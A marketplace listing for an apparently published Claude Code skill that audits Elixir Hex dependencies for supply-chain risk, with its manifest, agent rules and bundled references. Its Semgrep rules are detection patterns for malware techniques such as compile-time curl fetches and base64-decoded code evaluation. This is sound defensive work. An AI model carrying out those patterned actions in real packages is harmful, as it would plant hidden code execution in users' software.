Claude Skill

deps-audit

Audit Hex deps for supply-chain security risk — bidi chars, compile-time exec, maintainer changes, typosquats, CVEs. Use after mix deps.update, when checking if a package upgrade is safe, or reviewing mix.lock PR diffs.

LLM Mart · 0 points · 0 views 0 listing impressions 0 install-command copies
Virus-scanned Reviewed automatically before listing.

Full trust report

Download oliver-kriska-claude-elixir-phoenix-plugins_elixir-phoenix_skills_deps-audit-9767a82.zip · 87 KB
Part of oliver-kriska/claude-elixir-phoenix — 93 skills

Install

skills CLI npx skills add https://github.com/oliver-kriska/claude-elixir-phoenix/tree/main/plugins/elixir-phoenix/skills/deps-audit
Claude Code claude plugin marketplace add https://llmmart.ai/marketplace.json && claude plugin install oliver-kriska-claude-elixir-phoenix@llmmart
Git git clone https://github.com/oliver-kriska/claude-elixir-phoenix.git

The skills CLI installs just this skill, for any of its supported agents. Claude Code installs the whole oliver-kriska/claude-elixir-phoenix collection as a plugin from our marketplace. Git is the plain clone.

Skill manifest

Hex Dependency Audit

Non-mutating supply-chain audit for Hex packages. Runs an 8-rule MVP catalogue against changed packages, enriches with Hex API metadata, wraps existing tools (mix hex.audit, mix_audit, OSV-Scanner), and emits a triage table.

When to Use

  • After mix deps.update or mix deps.get brought in new versions
  • On PRs that touch mix.lock (pre-merge gate)
  • Before manually updating a single package (--preview <pkg>)
  • When investigating a dependency you don't recognize

Iron Laws

  1. NEVER claim a diff is clean without inspecting it. Run all 8 rules on the unpacked NEW tarball. "Looks fine" without a tool run is a false pass. Always write .claude/deps-audit/last-run.json — its absence is evidence the audit didn't actually run.
  2. NEVER install mix_audit / osv-scanner — even if asked. Detect, warn with install instructions, skip cleanly if missing. If the user says "install it," respond with the install command (e.g., mix deps.add mix_audit --only dev) and do not execute it. The audit skill is non-mutating; mix.exs / mix.lock are off-limits regardless of consent.
  3. NEVER promote a finding to BLOCK without rule citation. Every finding shows rule_id, severity, file:line, snippet, message. No handwaving.
  4. NEVER fetch from Hex API without rate-limiting. Cap at 5 req/sec. Cache metadata 7 days, top-500 list 1 day.
  5. NEVER run the audit on already-committed lock changes silently — tell the user which mode (A/B/C) is active and which (old, new) pairs resolved.
  6. LLM triage only above threshold. Native rules + Semgrep + YARA are deterministic. The hex-deps-triager agent runs only when score

    10 (1 BLOCK or 3+ WARNs), and its verdicts are advisory — never auto-suppress a finding without human review.

Operating Modes

Mode Trigger Old source New source
B (default) /phx:deps-audit git show HEAD:mix.lock working mix.lock
C (PR) /phx:deps-audit --base main git show <ref>:mix.lock working mix.lock
A (preview) /phx:deps-audit --preview httpoison locked version Hex API latest

See ${CLAUDE_SKILL_DIR}/references/operating-modes.md for full resolver logic.

Execution Flow

Default = full 8-rule scan with streaming progress. --quick opts out to CVE + retirement only. See ${CLAUDE_SKILL_DIR}/references/execution-flow.md.

Step 1: Resolve the diff

Parse the mix.lock Erlang term format for both old and new sources. Emit a list of {pkg, old_version, new_version} tuples. Surface new-only and removed-only packages separately (a removed package is not audited; a brand-new package gets old_version = nil and skips diff-only rules).

See ${CLAUDE_SKILL_DIR}/references/diff-resolver.md for shell + mix run -e snippets per mode and the JSON output contract.

Step 2: Fetch tarballs (per-run tmpdir)

For each (pkg, old, new):

mix hex.package fetch <pkg> <old> --unpack -o ${AUDIT_TMPDIR}/tarballs/<pkg>/<old>/
mix hex.package fetch <pkg> <new> --unpack -o ${AUDIT_TMPDIR}/tarballs/<pkg>/<new>/

All ephemeral artifacts live under ${AUDIT_TMPDIR} (driver-owned, removed on exit). See ${CLAUDE_SKILL_DIR}/references/audit-tmpdir.md and ${CLAUDE_SKILL_DIR}/references/tarball-fetcher.md.

Step 3: Run the 8 MVP rules on each NEW tarball

# Rule Sev Method
1 Bidi Unicode control chars in .ex/.exs/.erl BLOCK grep
2 Code.eval_* / :erlang.apply with non-literal MFA at module scope BLOCK AST (Sourceror or regex+scope)
3 System.cmd / :os.cmd / Port.open at compile time BLOCK AST
4 :erlang.binary_to_term/1 on literal without :safe BLOCK AST
5 New :git/:path dep in mix.exs (vs old) BLOCK AST diff
6 Maintainer change between versions BLOCK Hex API
7 Base64 blobs >256 chars outside priv/static/, test/fixtures/, assets/ WARN regex
8 Levenshtein ≤2 from top-500 + download delta >1000× BLOCK Hex API + fuzzy

Full catalogue (35 rules, MVP marked) in ${CLAUDE_SKILL_DIR}/references/heuristics.md. Bash + mix run -e implementations for all 8 MVP rules in ${CLAUDE_SKILL_DIR}/references/rules-impl.md (single-pass NEW + diff rules + Hex API rules, with run_all_rules master loop).

Step 4: External tool wrappers (parallel)

  • mix hex.audit — retired-package check, always available
  • mix_audit — CVE check via GHSA, if installed (else warn + skip; do NOT install)
  • osv-scanner — CVE check via OSV.dev, if installed (else warn + skip; do NOT install)

See ${CLAUDE_SKILL_DIR}/references/external-tools.md for detection, output parsing, and severity mapping per tool.

Step 5: Hex API enrichment (per package)

  • GET /api/packages/:name — owners, downloads, inserted_at
  • GET /api/packages/:name/releases/:version — per-release publisher
  • Compute: days_since_publish, owner_age_days, download_velocity

Cap at 5 req/sec. Per-run cache under ${AUDIT_TMPDIR}/hex-api/. See ${CLAUDE_SKILL_DIR}/references/hex-api.md for endpoint contracts, caching strategy, Rule 6/8 detection, and Levenshtein implementation.

Step 5.5: Apply hex_vet.exs ledger (if present)

If hex_vet.exs exists at project root, vetted-version findings are downgraded to INFO. Unvetted versions retain their severity. Lock-vs-ledger disagreement: lock wins. See the deps-vet skill's hex-vet schema doc for the "Lock-vs-ledger disagreement" section.

Use /phx:deps-vet <pkg> <version> (separate skill) to add entries.

Step 5.7: Differential subtract

When run with DIFFERENTIAL=1 (default), findings that existed in the OLD tarball are downgraded to INFO. Net-new signals reach the renderer at full severity. See ${CLAUDE_SKILL_DIR}/references/differential.md.

Step 5.8: LLM triage (when score > threshold)

For packages where the aggregate score exceeds 10, the hex-deps-triager sonnet agent reads finding + diff windows and produces structured verdicts (confidence, verdict, rationale, fp_reasons[]). A context-supervisor consolidates verdicts across packages into triage/consolidated.md. Main skill reads only the consolidated file.

See ${CLAUDE_SKILL_DIR}/references/llm-triage.md.

Step 6: Score & render

Per-package weighted sum: BLOCK = 10, WARN = 3, INFO = 1. Risk band: 0 clean · 1–5 low · 6–15 medium · 16+ high.

Output:

  1. Stdout: markdown table — pkg | old → new | risk | findings | diff.hex.pm | maintainer-change plus a per-package detail section for any non-clean row.
  2. Sidecar (MANDATORY): Write .claude/deps-audit/last-run.json. The Phase 3 gate reads this; an audit that doesn't write it is a no-op for the gate. Always emit, even on clean runs.

--json flag emits JSON to stdout instead of markdown. See ${CLAUDE_SKILL_DIR}/references/output-renderer.md for table format, sidecar schema, exit-code rubric, and --quiet mode.

Out of scope / Phase 3 surface

  • NEVER modify mix.lock, mix.exs, or any project file (non-mutating)
  • NEVER auto-install missing tools (warn + skip)
  • Gate mix deps.{get,update,compile} via deps-audit-gate.sh. See ${CLAUDE_SKILL_DIR}/references/hook.md.
  • Prompt for /phx:compound after BLOCK findings — corpus self-feeds.
  • Emit SARIF 2.1.0 via --sarif <path> and gate CI via --ci.

References

  • ${CLAUDE_SKILL_DIR}/references/heuristics.md — full 35-rule catalogue
  • ${CLAUDE_SKILL_DIR}/references/rules-impl.md — bash + mix run -e for the 8 MVP rules
  • ${CLAUDE_SKILL_DIR}/references/operating-modes.md — Mode A/B/C resolver
  • ${CLAUDE_SKILL_DIR}/references/diff-resolver.md — shell snippets, lock parser
  • ${CLAUDE_SKILL_DIR}/references/tarball-fetcher.md — fetch wrapper, parallel cap, cache prune
  • ${CLAUDE_SKILL_DIR}/references/external-tools.md — mix_audit, osv-scanner wrappers
  • ${CLAUDE_SKILL_DIR}/references/hex-api.md — endpoint contracts, rate limit, Rule 6/8
  • ${CLAUDE_SKILL_DIR}/references/output-renderer.md — markdown, JSON v1, exit codes, SARIF
  • ${CLAUDE_SKILL_DIR}/references/testing.md — smoke runner, fixture matrix
  • ${CLAUDE_SKILL_DIR}/references/differential.md / llm-triage.md — Phase 2 NDJSON subtract + triager
  • ${CLAUDE_SKILL_DIR}/references/semgrep.md / yara.md — Phase 2 precision layers (soft deps)
  • ${CLAUDE_SKILL_DIR}/references/cassettes.md / sarif.md / hook.md / ci-integration.md — Phase 3 surface
  • ${CLAUDE_SKILL_DIR}/references/trusted-publishers.md / skill-checklist.md — upstream + eval
  • ${CLAUDE_SKILL_DIR}/references/audit-tmpdir.md — Phase 5 per-run ephemeral storage contract
  • ${CLAUDE_SKILL_DIR}/references/execution-flow.md / differential-cve.md — Phase 5 default scan + CVE diff
Files (claude-elixir-phoenix)
  • priv
    • semgrep
      • elixir-supply-chain.yaml 2.4 KB
        rules:
          - id: elixir-compile-time-http
            message: HTTP fetch at compile time inside __before_compile__
            languages: [elixir]
            severity: ERROR
            pattern-either:
              - patterns:
                  - pattern-inside: |
                      defmacro __before_compile__($ENV) do
                        ...
                      end
                  - pattern: System.cmd("curl", $ARGS)
              - patterns:
                  - pattern-inside: |
                      defmacro __before_compile__($ENV) do
                        ...
                      end
                  - pattern: HTTPoison.get(...)
        
          - id: elixir-eval-string
            message: Code.eval_string with non-literal argument
            languages: [elixir]
            severity: ERROR
            pattern-either:
              - pattern: Code.eval_string($PAYLOAD)
              - pattern: Code.eval_quoted($PAYLOAD)
            pattern-not-either:
              - pattern: Code.eval_string("$LITERAL")
              - pattern: Code.eval_quoted("$LITERAL")
        
          - id: elixir-dynamic-system-cmd
            message: System.cmd with variable first argument
            languages: [elixir]
            severity: WARNING
            pattern: System.cmd($CMD, $ARGS)
            pattern-not: System.cmd("$LITERAL", $ARGS)
        
          - id: elixir-base64-to-eval
            message: Base.decode64 result fed directly to Code.eval_string
            languages: [elixir]
            severity: ERROR
            pattern-either:
              - pattern: Code.eval_string(Base.decode64!($X))
              - patterns:
                  - pattern: |
                      $X = Base.decode64!(...)
                      ...
                      Code.eval_string($X)
        
          - id: elixir-on-load-with-side-effects
            message: __on_load__ callback running System.cmd / File.write
            languages: [elixir]
            severity: ERROR
            pattern-either:
              - patterns:
                  - pattern-inside: |
                      def __on_load__() do
                        ...
                      end
                  - pattern: System.cmd(...)
              - patterns:
                  - pattern-inside: |
                      def __on_load__() do
                        ...
                      end
                  - pattern: File.write(...)
        
          - id: elixir-binary-to-term-literal
            message: :erlang.binary_to_term called without :safe option
            languages: [elixir]
            severity: ERROR
            patterns:
              - pattern: :erlang.binary_to_term($X)
              - pattern-not: :erlang.binary_to_term($X, [:safe])
        
          - id: elixir-erlang-apply-dynamic
            message: :erlang.apply with non-literal module or function name
            languages: [elixir]
            severity: ERROR
            pattern: :erlang.apply($MOD, $FUN, $ARGS)
            pattern-not: :erlang.apply($MOD, :$LITERAL_ATOM, $ARGS)
        
    • yara
      • hex-malware.yar 2.6 KB · in bundle
  • references
    • audit-tmpdir.md 8.6 KB
      # Audit Tmpdir — Ephemeral Per-Run Storage
      
      The audit skill maintains **no persistent on-disk cache**. Every audit
      invocation creates a fresh tmpdir, writes all working artifacts there,
      and removes the tmpdir on exit (via `trap EXIT`).
      
      The only persistent files the skill writes to the project are:
      
      - `.claude/deps-audit/last-run.json` — sidecar consumed by the Phase 3
        PreToolUse gate
      - `.claude/deps-audit/policy.exs` — Phase 3 gate policy config (manually
        created by the user; not generated by the audit)
      
      Everything else — tarballs, mix_audit JSON, CVE diffs, hex API metadata,
      findings NDJSON, SARIF output — lives in `${AUDIT_TMPDIR}` for the
      duration of one audit run only.
      
      ## Why ephemeral, not persistent
      
      The Phase 1-4 design used `.claude/deps-audit/cache/` with a 7-day
      metadata TTL and `prune_cache()` for tarballs >30 days old. The
      2026-05-13 design review identified three problems:
      
      1. **Cache invalidation is hard.** Rules change between releases, lock
         resolution semantics drift, and stale cache entries silently bypass
         updated logic. The Phase 4 `cache_signature.json` plan tried to
         protect against rule-version skew, but adds complexity that
         ephemeral storage sidesteps entirely.
      2. **Audit semantics demand reproducibility.** A run that says "no
         vulnerabilities" must reflect today's GHSA cache and today's Hex
         API, not last week's. Persistent caches encourage exactly the kind
         of "but it passed yesterday" false comfort that supply-chain
         tooling must resist.
      3. **The latency cost is bounded and acceptable.** A 25-package audit
         takes 60-90s cold (per virgil dogfood). The 4-way parallel tarball
         fetcher is the same in both architectures — caching only saves the
         second and subsequent runs of the *same* diff, which is a rare
         workflow in practice (people don't re-audit identical locks).
      
      ## Driver pattern
      
      Every entry-point into the audit MUST establish `AUDIT_TMPDIR` and
      register the EXIT trap before any other work:
      
      ```bash
      audit_main() {
        # Establish per-run tmpdir + cleanup trap. This is the FIRST thing
        # the driver does — before parsing args, before resolving the diff,
        # before any tool invocation that writes state.
        AUDIT_TMPDIR="$(mktemp -d -t phx-deps-audit-XXXXXX)" || {
          echo "ERROR: mktemp failed" >&2
          return 2
        }
        export AUDIT_TMPDIR
        # shellcheck disable=SC2064
        trap "rm -rf '${AUDIT_TMPDIR}'" EXIT
      
        # ... resolve diff, fetch tarballs, run rules, diff CVEs, render ...
        # All wrappers read AUDIT_TMPDIR from env.
      }
      ```
      
      The trap fires on:
      
      - Normal exit (rc=0 success path)
      - Non-zero exit (any function `return N` or `exit N` that bubbles up)
      - Ctrl-C / SIGTERM (bash propagates these to EXIT)
      - Shell errors under `set -e` (also flow through EXIT)
      
      ## Cross-tool-call handoff (CRITICAL — runtime reality)
      
      `audit_main()` above describes **one** long-lived shell. The actual
      runtime is different: each step of `/phx:deps-audit` is a **separate
      Bash tool call** with a fresh shell. Consequences:
      
      1. **`export AUDIT_TMPDIR` does NOT survive** between tool calls. The
         var set in call N is gone in call N+1.
      2. **Shell functions do NOT survive** either. `export -f` is bash-only
         (no-op under the user's zsh) and useless across calls regardless.
      3. **The EXIT trap in call N does NOT fire for call N+1.** Cleanup
         must be an explicit final command (`rm -rf "$AUDIT_TMPDIR"`), not a
         trap.
      
      **Pattern — persist the path, re-read it everywhere.** First command:
      
      ```bash
      AUDIT_TMPDIR="$(mktemp -d -t phx-deps-audit-XXXXXX)"
      printf '%s' "$AUDIT_TMPDIR" > "${TMPDIR:-/tmp}/phx-audit-dir.txt"
      echo "AUDIT_TMPDIR=$AUDIT_TMPDIR"
      ```
      
      Every subsequent command re-reads it as its first line:
      
      ```bash
      AUDIT_TMPDIR="$(cat "${TMPDIR:-/tmp}/phx-audit-dir.txt")"
      ```
      
      Final command tears down both:
      
      ```bash
      AUDIT_TMPDIR="$(cat "${TMPDIR:-/tmp}/phx-audit-dir.txt")"
      rm -rf "$AUDIT_TMPDIR" "${TMPDIR:-/tmp}/phx-audit-dir.txt"
      ```
      
      **Quoted-heredoc trap.** When a command writes a helper script via a
      heredoc, a *quoted* delimiter (`<<'EOF'`) does NOT expand
      `${AUDIT_TMPDIR}` — the script gets a literal `${AUDIT_TMPDIR}` that
      is empty in its own shell, so paths collapse to `/tarballs/...` and
      you get `mkdir: /tarballs: Read-only file system`. Either bake the
      resolved path in with an **unquoted** heredoc:
      
      ```bash
      AUDIT_TMPDIR="$(cat "${TMPDIR:-/tmp}/phx-audit-dir.txt")"
      cat > "${AUDIT_TMPDIR}/fetch.sh" <<EOF
      AUDIT_TMPDIR="${AUDIT_TMPDIR}"
      EOF
      ```
      
      …or keep the heredoc quoted and pass the path as `$1`. Never assume
      the helper inherits the env.
      
      If a subagent or helper spawns its own `mktemp -d` (e.g.,
      `_mix_audit_run_with_lock` for tmpdir lock-swap), that's a separate
      short-lived dir with its own `RETURN`/`EXIT` trap — nested cleanup,
      not a leak. The audit-level `AUDIT_TMPDIR` is the outer envelope.
      
      ## Standard subdirectories
      
      Convention (not enforced by code — every wrapper can place files
      wherever, but consistency aids debugging):
      
      ```
      ${AUDIT_TMPDIR}/
      ├── lock.old              # diff-resolver: HEAD/base mix.lock
      ├── lock.new              # diff-resolver: working mix.lock
      ├── diff.json             # diff-resolver: {changed, added, removed}
      ├── tarballs/<pkg>/<version>/    # unpacked Hex tarballs
      ├── hex-api/
      │   ├── packages/<pkg>.json
      │   └── top-500.json
      ├── mix-audit.json        # mix_audit single-state output
      ├── cves_old.json         # mix_audit on OLD lock (differential)
      ├── cves_new.json         # mix_audit on NEW lock (differential)
      ├── diff_cves.jsonl       # diff_cves.py output
      ├── findings.jsonl        # native rule findings (current run)
      └── findings.old.jsonl    # native rule findings (OLD tarballs)
      ```
      
      `last-run.json` is **not** under `${AUDIT_TMPDIR}` — it's copied to
      `.claude/deps-audit/last-run.json` as the very last step of rendering,
      just before the tmpdir is torn down.
      
      ## Migration from Phase 1-4 paths
      
      | Phase 1-4 path | Phase 5+ path |
      |----------------|---------------|
      | `.claude/deps-audit/cache/lock.old` | `${AUDIT_TMPDIR}/lock.old` |
      | `.claude/deps-audit/cache/lock.new` | `${AUDIT_TMPDIR}/lock.new` |
      | `.claude/deps-audit/cache/diff.json` | `${AUDIT_TMPDIR}/diff.json` |
      | `.claude/deps-audit/cache/<pkg>/<version>/` | `${AUDIT_TMPDIR}/tarballs/<pkg>/<version>/` |
      | `.claude/deps-audit/cache/hex-api/...` | `${AUDIT_TMPDIR}/hex-api/...` |
      | `.claude/deps-audit/cache/mix-audit.json` | `${AUDIT_TMPDIR}/mix-audit.json` |
      | `.claude/deps-audit/cache/cves_old.json` | `${AUDIT_TMPDIR}/cves_old.json` |
      | `.claude/deps-audit/cache/cves_new.json` | `${AUDIT_TMPDIR}/cves_new.json` |
      | `.claude/deps-audit/cache/diff_cves.jsonl` | `${AUDIT_TMPDIR}/diff_cves.jsonl` |
      | `.claude/deps-audit/cache/findings.jsonl` | `${AUDIT_TMPDIR}/findings.jsonl` |
      | `.claude/deps-audit/last-run.json` | **unchanged — persistent** |
      | `.claude/deps-audit/policy.exs` | **unchanged — persistent (user-owned)** |
      
      References still containing the old `.claude/deps-audit/cache/` paths
      are pre-Phase-5 wording that will be migrated incrementally.
      
      ## Removed: `prune_cache()`
      
      The tarball-fetcher.md `prune_cache()` function (Phase 1) walked
      `.claude/deps-audit/cache/` and `rm -rf`'d entries older than 30 days.
      This function no longer exists — the EXIT trap obsoletes it.
      
      ## Removed: `cache_signature.json`
      
      Phase 4's planned `cache_signature.json` (a sha256 of rule files +
      commit SHA used to invalidate the cache on plugin upgrade) is dropped.
      No cache, no invalidation problem.
      
      ## Fixture isolation
      
      Smoke fixtures (`lab/deps-audit/smoke-test/{fixtures,corpus}.d/`) operate inside the
      runner's own `mktemp -d`, NOT inside `AUDIT_TMPDIR`. This is by
      design: fixtures must be runnable without the full audit driver
      established. The fixture conventions are documented in `testing.md`.
      
      ## One-time migration: clean stale `.claude/deps-audit/cache/`
      
      Projects audited under Phase 1-4 may have leftover tarballs at
      `.claude/deps-audit/cache/<pkg>/<version>/`. These are cruft under the
      ephemeral model — never read, never refreshed, just disk noise.
      
      The driver SHOULD remove this directory at startup, once, if present:
      
      ```bash
      # Run BEFORE establishing AUDIT_TMPDIR. Idempotent.
      migrate_stale_cache() {
        local stale=".claude/deps-audit/cache"
        if [ -d "${stale}" ]; then
          echo "info: removing stale Phase 1-4 cache at ${stale}" >&2
          rm -rf "${stale}"
        fi
      }
      ```
      
      This is a one-shot cleanup, not a recurring prune (there's no cache
      to prune anymore). After the first v2.12.0 run on a project, the
      directory stays gone.
      
      ## Hook compatibility
      
      The Phase 3 PreToolUse gate hook (`deps-audit-gate.sh`) reads
      `.claude/deps-audit/last-run.json` only. It doesn't touch
      `${AUDIT_TMPDIR}` at all, so hook semantics are unchanged.
      
    • cassettes.md 8.3 KB
      # VCR cassettes — Hex API fixtures for Rules 6 + 8
      
      Rules 6 (maintainer change) and 8 (typosquat) hit the Hex API. To keep
      smoke fast and offline, we ship JSON cassettes that mock the two
      endpoints those rules consume.
      
      ## Iron Laws
      
      1. **Cassettes are SHA-pinned.** Each cassette has a `_meta.sha`
         recording the sha256 of the response body at capture time. Rules
         that depend on a cassette validate the SHA before consuming it —
         silent corruption is worse than no cassette.
      2. **NEVER auto-refresh.** Cassettes are committed artifacts. A
         maintainer's owner-change in real life MUST update a cassette
         in a real PR with an explicit reviewer — not via a CI auto-bump.
      3. **Cassette mode opts in via env var.** `HEX_API_BASE` defaults
         to `https://hex.pm/api`; tests set
         `HEX_API_BASE=file://test-assets/hex-api-cassettes/`. Production
         audits never touch the cassettes.
      4. **Empty cassette ≠ no maintainer.** When a cassette is absent,
         skip the rule with a logged warning, never silently pass.
      
      ## Endpoints covered
      
      | Endpoint | Cassette filename | Used by |
      |----------|-------------------|---------|
      | `GET /api/packages/:name` | `<pkg>.packages.json` | Rule 6, Rule 8 |
      | `GET /api/packages/:name/releases/:version` | `<pkg>.releases.<v>.json` | Rule 6 |
      
      ## Cassette layout
      
      ```text
      lab/deps-audit/test-assets/hex-api-cassettes/   # repo only, not shipped
      ├── phoenix.packages.json
      ├── phoenix.releases.1.7.20.json
      ├── phoenix.releases.1.7.21.json
      ├── jason.packages.json
      ├── jason.releases.1.4.4.json
      ├── phoeniix.packages.json          # synthetic typosquat for Rule 8
      └── _meta.json                       # SHA index, capture timestamps
      ```
      
      ## `_meta.json` shape
      
      ```json
      {
        "captured_at": "2026-05-12T18:00:00Z",
        "capture_source": "https://hex.pm/api",
        "files": {
          "phoenix.packages.json": {
            "sha256": "abc123...",
            "endpoint": "/api/packages/phoenix",
            "captured_at": "2026-05-12T18:00:00Z"
          }
        }
      }
      ```
      
      ## Response shape — `<pkg>.packages.json`
      
      Mirrors `hex.pm` API verbatim (only fields we consume):
      
      ```json
      {
        "name": "phoenix",
        "downloads": {
          "all": 192345678,
          "recent": 2345678
        },
        "owners": [
          {"username": "chrismccord", "email": "chris@example.com"},
          {"username": "team-phoenix", "email": "team@example.com"}
        ],
        "inserted_at": "2014-04-21T22:33:00Z",
        "updated_at": "2026-04-15T10:00:00Z",
        "latest_stable_version": "1.7.21"
      }
      ```
      
      ## Response shape — `<pkg>.releases.<v>.json`
      
      ```json
      {
        "version": "1.7.21",
        "inserted_at": "2026-04-15T10:00:00Z",
        "publisher": {
          "username": "chrismccord",
          "email": "chris@example.com"
        },
        "checksum": "0123456789abcdef...",
        "retired": null
      }
      ```
      
      ## Capturing a cassette
      
      ```bash
      # Helper script — capture.sh
      pkg=$1
      ver=$2
      out_dir=lab/deps-audit/test-assets/hex-api-cassettes
      
      curl -fsSL "https://hex.pm/api/packages/${pkg}" \
        | jq '.' > "${out_dir}/${pkg}.packages.json"
      
      if [ -n "${ver}" ]; then
        curl -fsSL "https://hex.pm/api/packages/${pkg}/releases/${ver}" \
          | jq '.' > "${out_dir}/${pkg}.releases.${ver}.json"
      fi
      
      # Update _meta.json with sha + timestamp.
      python3 -c "
      import json, hashlib, sys
      from datetime import datetime, timezone
      meta_path = '${out_dir}/_meta.json'
      meta = json.load(open(meta_path)) if open(meta_path, 'r').readable() else {'files': {}}
      for fname in ['${pkg}.packages.json', '${pkg}.releases.${ver}.json']:
          path = '${out_dir}/' + fname
          try:
              body = open(path, 'rb').read()
              meta['files'][fname] = {
                  'sha256': hashlib.sha256(body).hexdigest(),
                  'captured_at': datetime.now(timezone.utc).isoformat()
              }
          except FileNotFoundError:
              pass
      meta['captured_at'] = datetime.now(timezone.utc).isoformat()
      json.dump(meta, open(meta_path, 'w'), indent=2)
      "
      ```
      
      ## Consumer pattern (Rules 6 + 8)
      
      ```bash
      hex_api_get() {
        local endpoint="$1"
        if [[ "${HEX_API_BASE:-https://hex.pm/api}" == file://* ]]; then
          local base="${HEX_API_BASE#file://}"
          local cassette
          cassette=$(printf '%s' "${endpoint}" \
            | sed -E 's|^/api/packages/([^/]+)$|\1.packages.json|;
                      s|^/api/packages/([^/]+)/releases/(.+)$|\1.releases.\2.json|')
          cat "${base}/${cassette}" 2>/dev/null || {
            echo "cassette missing: ${cassette}" >&2
            return 1
          }
        else
          curl -fsSL "${HEX_API_BASE:-https://hex.pm/api}${endpoint}"
        fi
      }
      ```
      
      ## Cassettes shipped with Phase 2
      
      Phase 2 ships cassettes for:
      
      - The 10 synthetic malicious fixtures' supporting packages
      - A sample of 5 benign top-100 packages for smoke calibration
      - The 5 real-world calibration packages (`hex_core`, `hex`, `rebar3`,
        `tls_certificate_check`, plus mix.lock crossing CVE-2026-23940)
      
      Full top-100 cassettes are NOT shipped — they regenerate via the seed
      job (see `seed.md`).
      
      ## Validation in smoke
      
      The smoke `runner.sh` does not currently consume cassettes (Rules 6 + 8
      aren't in the offline smoke surface). When Phase 2 wires them in,
      `runner.sh` will gain:
      
      ```bash
      export HEX_API_BASE="file://${HARNESS_ROOT}/../test-assets/hex-api-cassettes"
      ```
      
      Per-fixture `expected.txt` then asserts on `rule:6` / `rule:8` counts.
      
      ## Lifecycle — Phase 3 monthly regen + drift detection
      
      Cassettes captured ad-hoc go stale without a refresh schedule. Phase 3
      ships a monthly regeneration workflow and drift detection at audit
      runtime.
      
      ### Monthly regen workflow
      
      `.github/workflows/cassette-regen.yml` runs on the 5th of every month
      (staggered from the seed-regen run on the 1st) and on manual
      `workflow_dispatch`:
      
      1. Check out repo, install jq + Python 3.
      2. Iterate over the top-100 seed list (`lab/deps-audit/smoke-test/corpus.d/benign-100.txt`).
      3. For each package, call `bash lab/deps-audit/capture.sh <pkg>` against
         live `https://hex.pm/api`. The script updates `_meta.json` SHA
         entries.
      4. If any cassette content changed, open a PR via
         `peter-evans/create-pull-request@v6` with summary "Monthly cassette
         regen: N packages updated."
      
      ### 403 fallback
      
      Some org GitHub policies deny `GITHUB_TOKEN` PR creation
      ("Actions cannot create pull requests"). The workflow checks the
      `create-pull-request` action's exit + status, and on 403:
      
      1. Uploads the regenerated `test-assets/hex-api-cassettes/` tree as a
         workflow artifact (90-day retention).
      2. Writes a job summary: "cassettes regenerated as artifact; PR
         creation requires a repo admin to enable
         Settings → Actions → Allow GitHub Actions to create pull requests."
      3. Exits 0 — the regen ran successfully even if the PR didn't.
      4. Optional: posts to `${SLACK_WEBHOOK_URL}` if the secret exists.
      
      The artifact path is `cassettes-regen-<run-id>.zip`. Maintainers
      download it, run `tar xf …`, commit manually.
      
      ### Drift detection at audit runtime
      
      The audit body reads `_meta.json` before consuming any cassette:
      
      ```bash
      expected_sha=$(jq -r ".files[\"${cassette}\"].sha256" "${meta_path}")
      actual_sha=$(shasum -a 256 "${cassette_path}" | awk '{print $1}')
      if [ "${expected_sha}" != "${actual_sha}" ]; then
        echo "phx-deps-audit: cassette stale — ${cassette} (sha mismatch)" >&2
        # Continue, but emit INFO so the renderer surfaces "stale cassette" in output.
        emit_finding rule:6 severity:info \
          "Cassette ${cassette} SHA drift — consider regenerating."
      fi
      ```
      
      Drift on a single cassette doesn't fail the audit. It surfaces in
      the renderer's "carried-over risks" section. If >10% of cassettes
      drift in one run, the renderer's tail prints a one-liner pointing
      at the regen workflow.
      
      ### Per-PR capture pattern (manual)
      
      When a user adds a `hex_vet.exs` entry for a package without a
      cassette, document the manual flow in the PR:
      
      ```bash
      bash lab/deps-audit/capture.sh <pkg> <ver>
      git add lab/deps-audit/test-assets/hex-api-cassettes/
      ```
      
      Reviewers should diff the cassette body and the `_meta.json` SHA
      update together — a maintainer change in the captured response
      should match the package's actual maintainer history. This catches
      the scenario where a malicious cassette is committed alongside a
      seemingly-benign code change.
      
      ### Why monthly, not weekly
      
      Weekly regen would catch drift sooner but doubles the PR noise. The
      audit body's drift detection covers the "I haven't run regen in 6
      weeks" case by surfacing stale cassettes as INFO — users get a clear
      nudge without the maintainer overhead of weekly merges. Re-evaluate
      after the first 6 months of operation.
      
    • ci-integration.md 6.3 KB
      # CI integration — `--ci` flag and sample workflows
      
      Phase 3 adds non-interactive `--ci` mode to `/phx:deps-audit` for use
      in GitHub Actions, CircleCI, GitLab CI, and similar runners. Pairs
      with `--sarif <path>` (Phase 2) to feed results into the host
      platform's code-scanning UI.
      
      ## `--ci` semantics
      
      `--ci` makes three behavioral changes to the default audit:
      
      1. **No interactive prompts.** `AskUserQuestion` would block forever
         in CI. `--ci` short-circuits all prompts to their conservative
         default (skip vetting, never auto-approve).
      2. **Strict exit codes.** Three exit codes drive the gating decision:
      
         | Exit | Meaning |
         |------|---------|
         | 0 | Audit clean — no BLOCK findings |
         | 1 | One or more BLOCK findings — fail CI |
         | 2 | Required tool missing (e.g., `mix_audit` not installed and CI strictness demands it) — fail CI as misconfiguration, not a security finding |
      
      3. **Machine-only output.** Stdout becomes JSON unless `--sarif <path>`
         is also supplied (in which case SARIF lands in the file and stdout
         stays JSON for log readability).
      
      `--ci` implies `--no-llm` by default (LLM triage adds wall-time and
      non-determinism unsuitable for CI). Override with `--ci --llm` when
      running an explicit pre-merge audit job that has the budget.
      
      ## GitHub Actions
      
      ```yaml
      name: Hex deps audit
      on:
        pull_request:
          paths: ['mix.lock', 'mix.exs', 'hex_vet.exs']
        push:
          branches: [main]
      
      jobs:
        deps-audit:
          runs-on: ubuntu-latest
          permissions:
            contents: read
            security-events: write   # required for upload-sarif
          steps:
            - uses: actions/checkout@v6
              with:
                fetch-depth: 0       # full history so --base can diff against main
            - uses: erlef/setup-beam@v1
              with:
                otp-version: '27.x'
                elixir-version: '1.18.x'
            - name: Audit Hex deps
              run: |
                mix phx.deps_audit --ci \
                  --base origin/main \
                  --sarif audit.sarif
            - name: Upload SARIF to Code Scanning
              if: always()           # upload even on audit failure so reviewers see findings
              uses: github/codeql-action/upload-sarif@v3
              with:
                sarif_file: audit.sarif
                category: phx-deps-audit
      ```
      
      The `if: always()` on upload-sarif is critical: when the audit exits 1
      on BLOCK findings, the job has `failed` status, and a strict
      `if: success()` would skip the upload — leaving reviewers with no
      in-UI feedback on what failed.
      
      ## CircleCI
      
      ```yaml
      version: 2.1
      jobs:
        deps-audit:
          docker:
            - image: hexpm/elixir:1.18.0-erlang-27.0.0-alpine-3.18.0
          steps:
            - checkout
            - run:
                name: Audit Hex deps
                command: |
                  mix local.hex --force
